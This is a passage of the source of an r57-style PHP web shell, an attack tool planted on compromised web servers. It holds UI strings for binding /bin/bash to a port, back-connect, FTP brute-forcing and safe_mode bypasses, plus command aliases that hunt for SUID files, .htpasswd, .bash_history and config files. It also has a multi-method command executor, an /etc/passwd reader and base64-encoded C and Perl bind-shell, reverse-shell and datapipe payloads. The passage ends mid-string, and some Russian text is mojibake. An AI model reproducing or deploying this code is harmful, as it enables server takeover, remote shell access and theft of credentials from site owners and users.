=>'Select alias', +'eng_butt1' =>'Execute', +'eng_butt2' =>'Upload', +'eng_text9' =>'Bind port to /bin/bash', +'eng_text10'=>'Port', +'eng_text11'=>'Password for access', +'eng_butt3' =>'Bind', +'eng_text12'=>'back-connect', +'eng_text13'=>'IP', +'eng_text14'=>'Port', +'eng_butt4' =>'Connect', +'eng_text15'=>'Upload files from remote server', +'eng_text16'=>'With', +'eng_text17'=>'Remote file', +'eng_text18'=>'Local file', +'eng_text19'=>'Exploits', +'eng_text20'=>'Use', +'eng_text21'=>'&nbsp;New name', +'eng_text22'=>'datapipe', +'eng_text23'=>'Local port', +'eng_text24'=>'Remote host', +'eng_text25'=>'Remote port', +'eng_text26'=>'Use', +'eng_butt5' =>'Run', +'eng_text28'=>'Work in safe_mode', +'eng_text29'=>'ACCESS DENIED', +'eng_butt6' =>'Change', +'eng_text30'=>'Cat file', +'eng_butt7' =>'Show', +'eng_text31'=>'File not found', +'eng_text32'=>'Eval PHP code', +'eng_text33'=>'Test bypass open_basedir with cURL functions', +'eng_butt8' =>'Test', +'eng_text34'=>'Test bypass safe_mode with include function', +'eng_text35'=>'Test bypass safe_mode with load file in mysql', +'eng_text36'=>'Database . Table', +'eng_text37'=>'Login', +'eng_text38'=>'Password', +'eng_text39'=>'Database', +'eng_text40'=>'Dump database table', +'eng_butt9' =>'Dump', +'eng_text41'=>'Save dump in file', +'eng_text42'=>'Edit files', +'eng_text43'=>'File for edit', +'eng_butt10'=>'Save', +'eng_text44'=>'Can\'t edit file! Only read access!', +'eng_text45'=>'File saved', +'eng_text46'=>'Show phpinfo()', +'eng_text47'=>'Show variables from php.ini', +'eng_text48'=>'Delete temp files', +'eng_butt11'=>'Edit file', +'eng_text49'=>'Delete script from server', +'eng_text50'=>'View cpu info', +'eng_text51'=>'View memory info', +'eng_text52'=>'Find text', +'eng_text53'=>'In dirs', +'eng_text54'=>'Find text in files', +'eng_butt12'=>'Find', +'eng_text55'=>'Only in files', +'eng_text56'=>'Nothing :(', +'eng_text57'=>'Create/Delete File/Dir', +'eng_text58'=>'name', +'eng_text59'=>'file', +'eng_text60'=>'dir', +'eng_butt13'=>'Create/Delete', +'eng_text61'=>'File created', +'eng_text62'=>'Dir created', +'eng_text63'=>'File deleted', +'eng_text64'=>'Dir deleted', +'eng_text65'=>'Create', +'eng_text66'=>'Delete', +'eng_text67'=>'Chown/Chgrp/Chmod', +'eng_text68'=>'Command', +'eng_text69'=>'param1', +'eng_text70'=>'param2', +'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...", +'eng_text72'=>'Text for find', +'eng_text73'=>'Find in folder', +'eng_text74'=>'Find in files', +'eng_text75'=>'* you can use regexp', +'eng_text76'=>'Search text in files via find', +'eng_text80'=>'Type', +'eng_text81'=>'Net', +'eng_text82'=>'Databases', +'eng_text83'=>'Run SQL query', +'eng_text84'=>'SQL query', +'eng_text85'=>'Test bypass safe_mode with commands execute via MSSQL server', +'eng_text86'=>'Download files from server', +'eng_butt14'=>'Download', +'eng_text87'=>'Download files from remote ftp-server', +'eng_text88'=>'FTP-server:port', +'eng_text89'=>'File on ftp', +'eng_text90'=>'Transfer mode', +'eng_text91'=>'Archivation', +'eng_text92'=>'without archivation', +'eng_text93'=>'FTP', +'eng_text94'=>'FTP-bruteforce', +'eng_text95'=>'Users list', +'eng_text96'=>'Can\'t get users list', +'eng_text97'=>'checked: ', +'eng_text98'=>'success: ', +'eng_text99'=>'* use username from /etc/passwd for ftp login and password', +'eng_text100'=>'Send file to remote ftp server', +'eng_text101'=>'Use reverse (user -> resu) login for password', +'eng_text102'=>'Mail', +'eng_text103'=>'Send email', +'eng_text104'=>'Send file to email', +'eng_text105'=>'To', +'eng_text106'=>'From', +'eng_text107'=>'Subj', +'eng_butt15'=>'Send', +'eng_text108'=>'Mail', +'eng_text109'=>'Hide', +'eng_text110'=>'Show', +'eng_text111'=>'SQL-Server : Port', +'eng_text112'=>'Test bypass safe_mode with function mb_send_mail', +'eng_text113'=>'Test bypass safe_mode, view dir list via imap_list', +'eng_text114'=>'Test bypass safe_mode, view file contest via imap_body', +'eng_text777'=>'bypass safemode with copy()', +'eng_text888'=>'File name', +'eng_text7777'=>'bypass safemode with curl()', +'eng_text8888'=>'File name', +'eng_text999'=>'bypass safemode with imap()', +'eng_text9999'=>'File name', +'eng_text1010'=>'bypass safemode with id()', +'eng_text101010'=>'', +); +/* +أ€أ«أ¨أ أ±أ» أھأ®أ¬أ أ­أ¤ +أڈأ®أ§أ¢أ®أ«أ؟أ¾أ² أ¨أ§أ،أ¥أ¦أ أ²أ¼ أ¬أ­أ®أ£أ®أھأ°أ أ²أ­أ®أ£أ® أ­أ أ،أ®أ°أ  أ®أ¤أ­أ¨أµ أ¨ أ²أ¥أµ-أ¦أ¥ أھأ®أ¬أ أ­أ¤. ( أ‘أ¤أ¥أ«أ أ­أ® أ،أ«أ أ£أ®أ¤أ أ°أ؟ أ¬أ®أ¥أ© أ¯أ°أ¨أ°أ®أ¤أ­أ®أ© أ«أ¥أ­أ¨ ) +أ‚أ» أ¬أ®أ¦أ¥أ²أ¥ أ±أ أ¬أ¨ أ¤أ®أ،أ أ¢أ«أ؟أ²أ¼ أ¨أ«أ¨ أ¨أ§أ¬أ¥أ­أ؟أ²أ¼ أھأ®أ¬أ أ­أ¤أ». +*/ +$aliases=array( +'find suid files'=>'find / -type f -perm -04000 -ls', +'find suid files in current dir'=>'find . -type f -perm -04000 -ls', +'find sgid files'=>'find / -type f -perm -02000 -ls', +'find sgid files in current dir'=>'find . -type f -perm -02000 -ls', +'find config.inc.php files'=>'find / -type f -name config.inc.php', +'find config.inc.php files in current dir'=>'find . -type f -name config.inc.php', +'find config* files'=>'find / -type f -name "config*"', +'find config* files in current dir'=>'find . -type f -name "config*"', +'find all writable files'=>'find / -type f -perm -2 -ls', +'find all writable files in current dir'=>'find . -type f -perm -2 -ls', +'find all writable directories'=>'find / -type d -perm -2 -ls', +'find all writable directories in current dir'=>'find . -type d -perm -2 -ls', +'find all writable directories and files'=>'find / -perm -2 -ls', +'find all writable directories and files in current dir'=>'find . -perm -2 -ls', +'find all service.pwd files'=>'find / -type f -name service.pwd', +'find service.pwd files in current dir'=>'find . -type f -name service.pwd', +'find all .htpasswd files'=>'find / -type f -name .htpasswd', +'find .htpasswd files in current dir'=>'find . -type f -name .htpasswd', +'find all .bash_history files'=>'find / -type f -name .bash_history', +'find .bash_history files in current dir'=>'find . -type f -name .bash_history', +'find all .mysql_history files'=>'find / -type f -name .mysql_history', +'find .mysql_history files in current dir'=>'find . -type f -name .mysql_history', +'find all .fetchmailrc files'=>'find / -type f -name .fetchmailrc', +'find .fetchmailrc files in current dir'=>'find . -type f -name .fetchmailrc', +'list file attributes on a Linux second extended file system'=>'lsattr -va', +'show opened ports'=>'netstat -an | grep -i listen', +'----------------------------------------------------------------------------------------------------'=>'ls -la' +); +$table_up1 = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: "; +$table_up2 = " ::</div></b></font></td></tr><tr><td>"; +$table_up3 = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc>"; +$table_end1 = "</td></tr>"; +$arrow = " <font face=Wingdings color=gray>أ¨</font>"; +$lb = "<font color=black>[</font>"; +$rb = "<font color=black>]</font>"; +$font = "<font face=Verdana size=-2>"; +$ts = "<table class=table1 width=100% align=center>"; +$te = "</table>"; +$fs = "<form name=form method=POST>"; +$fe = "</form>"; + +if(isset($_GET['users'])) + { + if(!$users=get_users()) { echo "<center><font face=Verdana size=-2 color=red>".$lang[$language.'_text96']."</font></center>"; } + else + { + echo '<center>'; + foreach($users as $user) { echo $user."<br>"; } + echo '</center>'; + } + echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); + } + +if (!empty($_POST['dir'])) { @chdir($_POST['dir']); } +$dir = @getcwd(); +$windows = 0; +$unix = 0; +if(strlen($dir)>1 && $dir[1]==":") $windows=1; else $unix=1; +if(empty($dir)) + { + $os = getenv('OS'); + if(empty($os)){ $os = php_uname(); } + if(empty($os)){ $os ="-"; $unix=1; } + else + { + if(@eregi("^win",$os)) { $windows = 1; } + else { $unix = 1; } + } + } +if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text") + { + echo $head; + if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); } + else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); } + $sr->SearchText(0,0); + $res = $sr->GetResultFiles(); + $found = $sr->GetMatchesCount(); + $titles = $sr->GetTitles(); + $r = ""; + if($found > 0) + { + $r .= "<TABLE width=100%>"; + foreach($res as $file=>$v) + { + $r .= "<TR>"; + $r .= "<TD colspan=2><font face=Verdana size=-2><b>".ws(3); + $r .= ($windows)? str_replace("/","\\",$file) : $file; + $r .= "</b></font></ TD>"; + $r .= "</TR>"; + foreach($v as $a=>$b) + { + $r .= "<TR>"; + $r .= "<TD align=center><B><font face=Verdana size=-2>".$a."</font></B></TD>"; + $r .= "<TD><font face=Verdana size=-2>".ws(2).$b."</font></TD>"; + $r .= "</TR>\n"; + } + } + $r .= "</TABLE>"; + echo $r; + } + else + { + echo "<P align=center><B><font face=Verdana size=-2>".$lang[$language.'_text56']."</B></font></P>"; + } + echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; + die(); + } +if(strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; } +$SERVER_SOFTWARE = getenv('SERVER_SOFTWARE'); +if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; } +function ws($i) +{ +return @str_repeat("&nbsp;",$i); +} +function ex($cfe) +{ + $res = ''; + if (!empty($cfe)) + { + if(function_exists('exec')) + { + @exec($cfe,$res); + $res = join("\n",$res); + } + elseif(function_exists('shell_exec')) + { + $res = @shell_exec($cfe); + } + elseif(function_exists('system')) + { + @ob_start(); + @system($cfe); + $res = @ob_get_contents(); + @ob_end_clean(); + } + elseif(function_exists('passthru')) + { + @ob_start(); + @passthru($cfe); + $res = @ob_get_contents(); + @ob_end_clean(); + } + elseif(@is_resource($f = @popen($cfe,"r"))) + { + $res = ""; + while(!@feof($f)) { $res .= @fread($f,1024); } + @pclose($f); + } + } + return $res; +} +function get_users() +{ + $users = array(); + $rows=file('/etc/passwd'); + if(!$rows) return 0; + foreach ($rows as $string) + { + $user = @explode(":",$string); + if(substr($string,0,1)!='#') array_push($users,$user[0]); + } + return $users; +} +function we($i) +{ +if($GLOBALS['language']=="ru"){ $text = 'أژأ¸أ¨أ،أھأ ! أچأ¥ أ¬أ®أ£أ³ أ§أ أ¯أ¨أ±أ أ²أ¼ أ¢ أ´أ أ©أ« '; } +else { $text = "[-] ERROR! Can't write in file "; } +echo "<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>"; +return null; +} +function re($i) +{ +if($GLOBALS['language']=="ru"){ $text = 'أژأ¸أ¨أ،أھأ ! أچأ¥ أ¬أ®أ£أ³ أ¯أ°أ®أ·أ¨أ²أ أ²أ¼ أ´أ أ©أ« '; } +else { $text = "[-] ERROR! Can't read file "; } +echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>"; +return null; +} +function ce($i) +{ +if($GLOBALS['language']=="ru"){ $text = "أچأ¥ أ³أ¤أ أ«أ®أ±أ¼ أ±أ®أ§أ¤أ أ²أ¼ "; } +else { $text = "Can't create "; } +echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>"; +return null; +} +function fe($l,$n) +{ +$text['ru'] = array('أچأ¥ أ³أ¤أ أ«أ®أ±أ¼ أ¯أ®أ¤أھأ«أ¾أ·أ¨أ²أ¼أ±أ؟ أھ ftp أ±أ¥أ°أ¢أ¥أ°أ³','أژأ¸أ¨أ،أھأ  أ أ¢أ²أ®أ°أ¨أ§أ أ¶أ¨أ¨ أ­أ  ftp أ±أ¥أ°أ¢أ¥أ°أ¥','أچأ¥ أ³أ¤أ أ«أ®أ±أ¼ أ¯أ®أ¬أ¥أ­أ؟أ²أ¼ أ¤أ¨أ°أ¥أھأ²أ®أ°أ¨أ¾ أ­أ  ftp أ±أ¥أ°أ¢أ¥أ°أ¥'); +$text['eng'] = array('Connect to ftp server failed','Login to ftp server failed','Can\'t change dir on ftp server'); +echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text[$l][$n]."</b></div></font></td></tr></table>"; +return null; +} +function mr($l,$n) +{ +$text['ru'] = array('أچأ¥ أ³أ¤أ أ«أ®أ±أ¼ أ®أ²أ¯أ°أ أ¢أ¨أ²أ¼ أ¯أ¨أ±أ¼أ¬أ®','أڈأ¨أ±أ¼أ¬أ® أ®أ²أ¯أ°أ أ¢أ«أ¥أ­أ®'); +$text['eng'] = array('Can\'t send mail','Mail sent'); +echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text[$l][$n]."</b></div></font></td></tr></table>"; +return null; +} +function perms($mode) +{ +if ($GLOBALS['windows']) return 0; +if( $mode & 0x1000 ) { $type='p'; } +else if( $mode & 0x2000 ) { $type='c'; } +else if( $mode & 0x4000 ) { $type='d'; } +else if( $mode & 0x6000 ) { $type='b'; } +else if( $mode & 0x8000 ) { $type='-'; } +else if( $mode & 0xA000 ) { $type='l'; } +else if( $mode & 0xC000 ) { $type='s'; } +else $type='u'; +$owner["read"] = ($mode & 00400) ? 'r' : '-'; +$owner["write"] = ($mode & 00200) ? 'w' : '-'; +$owner["execute"] = ($mode & 00100) ? 'x' : '-'; +$group["read"] = ($mode & 00040) ? 'r' : '-'; +$group["write"] = ($mode & 00020) ? 'w' : '-'; +$group["execute"] = ($mode & 00010) ? 'x' : '-'; +$world["read"] = ($mode & 00004) ? 'r' : '-'; +$world["write"] = ($mode & 00002) ? 'w' : '-'; +$world["execute"] = ($mode & 00001) ? 'x' : '-'; +if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S'; +if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S'; +if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T'; +$s=sprintf("%1s", $type); +$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']); +$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']); +$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']); +return trim($s); +} +function in($type,$name,$size,$value) +{ + $ret = "<input type=".$type." name=".$name." "; + if($size != 0) { $ret .= "size=".$size." "; } + $ret .= "value=\"".$value."\">"; + return $ret; +} +function which($pr) +{ +$path = ex("which $pr"); +if(!empty($path)) { return $path; } else { return $pr; } +} +function cf($fname,$text) +{ + $w_file=@fopen($fname,"w") or we($fname); + if($w_file) + { + @fputs($w_file,@base64_decode($text)); + @fclose($w_file); + } +} +function sr($l,$t1,$t2) + { + return "<tr class=tr1><td class=td1 width=".$l."% align=right>".$t1."</td><td class=td1 align=left>".$t2."</td></tr>"; + } +if (!@function_exists("view_size")) +{ +function view_size($size) +{ + if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";} + elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";} + elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";} + else {$size = $size . " B";} + return $size; +} +} + function DirFilesR($dir,$types='') + { + $files = Array(); + if(($handle = @opendir($dir))) + { + while (false !== ($file = @readdir($handle))) + { + if ($file != "." && $file != "..") + { + if(@is_dir($dir."/".$file)) + $files = @array_merge($files,DirFilesR($dir."/".$file,$types)); + else + { + $pos = @strrpos($file,"."); + $ext = @substr($file,$pos,@strlen($file)-$pos); + if($types) + { + if(@in_array($ext,explode(';',$types))) + $files[] = $dir."/".$file; + } + else + $files[] = $dir."/".$file; + } + } + } + @closedir($handle); + } + return $files; + } + class SearchResult + { + var $text; + var $FilesToSearch; + var $ResultFiles; + var $FilesTotal; + var $MatchesCount; + var $FileMatschesCount; + var $TimeStart; + var $TimeTotal; + var $titles; + function SearchResult($dir,$text,$filter='') + { + $dirs = @explode(";",$dir); + $this->FilesToSearch = Array(); + for($a=0;$a<count($dirs);$a++) + $this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter)); + $this->text = $text; + $this->FilesTotal = @count($this->FilesToSearch); + $this->TimeStart = getmicrotime(); + $this->MatchesCount = 0; + $this->ResultFiles = Array(); + $this->FileMatchesCount = Array(); + $this->titles = Array(); + } + function GetFilesTotal() { return $this->FilesTotal; } + function GetTitles() { return $this->titles; } + function GetTimeTotal() { return $this->TimeTotal; } + function GetMatchesCount() { return $this->MatchesCount; } + function GetFileMatchesCount() { return $this->FileMatchesCount; } + function GetResultFiles() { return $this->ResultFiles; } + function SearchText($phrase=0,$case=0) { + $qq = @explode(' ',$this->text); + $delim = '|'; + if($phrase) + foreach($qq as $k=>$v) + $qq[$k] = '\b'.$v.'\b'; + $words = '('.@implode($delim,$qq).')'; + $pattern = "/".$words."/"; + if(!$case) + $pattern .= 'i'; + foreach($this->FilesToSearch as $k=>$filename) + { + $this->FileMatchesCount[$filename] = 0; + $FileStrings = @file($filename) or @next; + for($a=0;$a<@count($FileStrings);$a++) + { + $count = 0; + $CurString = $FileStrings[$a]; + $CurString = @Trim($CurString); + $CurString = @strip_tags($CurString); + $aa = ''; + if(($count = @preg_match_all($pattern,$CurString,$aa))) + { + $CurString = @preg_replace($pattern,"<SPAN style='color: #990000;'><b>\\1</b></SPAN>",$CurString); + $this->ResultFiles[$filename][$a+1] = $CurString; + $this->MatchesCount += $count; + $this->FileMatchesCount[$filename] += $count; + } + } + } + $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4); + } + } + function getmicrotime() + { + list($usec,$sec) = @explode(" ",@microtime()); + return ((float)$usec + (float)$sec); + } +$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS +A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I +GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt +b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9 +pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF +NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK +ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog +ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk +7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2 +9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld +2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu +dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp +lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0="; +$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS +VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs +JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV +TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG +lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK +Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i +Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N +lIENPTk47DQpleGl0IDA7DQp9DQp9"; +$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj +aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR +hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT +sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI +kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi +KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl +OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; +$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC +BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb +SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd +KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ +sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC +Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D +QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp +Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="; +$datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2 +x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb +HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj +aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ +lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm +xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga +W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy +LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV +udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow +0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb +iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l +KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA +gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS +hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC +iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh +ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ 